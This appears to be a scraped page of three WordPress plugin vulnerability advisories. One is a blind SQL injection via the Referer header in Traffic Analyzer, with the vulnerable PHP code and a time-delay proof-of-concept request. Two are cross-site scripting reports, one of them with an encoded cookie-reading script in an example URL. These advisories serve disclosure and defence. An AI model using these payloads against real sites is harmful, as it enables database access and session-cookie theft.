# Exploit Author: Dan King (@fuzztester)
# Vendor Homepage: http://wptrafficanalyzer.in/
# Software Link: https://wordpress.org/plugins/trafficanalyzer/
# Version: 3.4.2
# Tested on: Ubuntu 14.10 with Mysql and Wordpress 4.11

[+] Issue [+]

The Wordpress plugin "Traffic Analyzer" is vulnerable to a blind SQL injection vulnerability. The application does not properly validate input from the "Referer" HTTP header value.

[+] Impact [+]

This vulnerability would allow a remote attacker to access the database with the privleges configured by Wordpress. This could also lead to the attack gaining remote access to the webservers filesystem and further compromise the system hosting the Wordpress installation.

[+] Details [+]

The following section of PHP code is where the vulnerability exists. The $sql variable is a concatenated string intended on being used to insert data into the database. The the variable $referer is not checked for malicious data.

From 'class-TrafficAnalyzer.php' line number 297:

######################################################################################
$sql = " insert into $wpdb->prefix"."tanalyzer_pre ( hid,ip, script_name, user_agent, request_uri,resource_type,browser,resource,http_referer,wpta_cookie ) values ".
                                        " ('".$hid."'," .
                                        " '".$_SERVER["REMOTE_ADDR"]."', ".
                                        "'".$_SERVER['SCRIPT_NAME']."', " .
                                        " '".$_SERVER["HTTP_USER_AGENT"]."', ".
                                        " '". $_SERVER['REQUEST_URI']. "', ".
                                        " '".$resource_type."', " .
                                        " '".$browser."', " .
                                        " '".$resource ."', " .
                                        " '".$referer . "', " .
                                        " '".$this->wpta_cookie . "'" .
                                        " )";
###########################################################################################


[+] Proof of Concept [+]

Sending the following HTTP request to a vulnerable site will cause the request to be delayed for 30 seconds.

GET /[wordpress path]/ HTTP/1.1
Host: x.x.x.x
Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'
HireHackking 
source: https://www.securityfocus.com/bid/58948/info

The Traffic Analyzer plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss]
HireHackking 
source: https://www.securityfocus.com/bid/53551/info

The Track That Stat plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Track That Stat 1.0.8 is vulnerable; other versions may also be affected. 

http://www.example.com/wp.bacon/wp-content/plugins/track-that-stat/js/trackthatstat.php?data=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B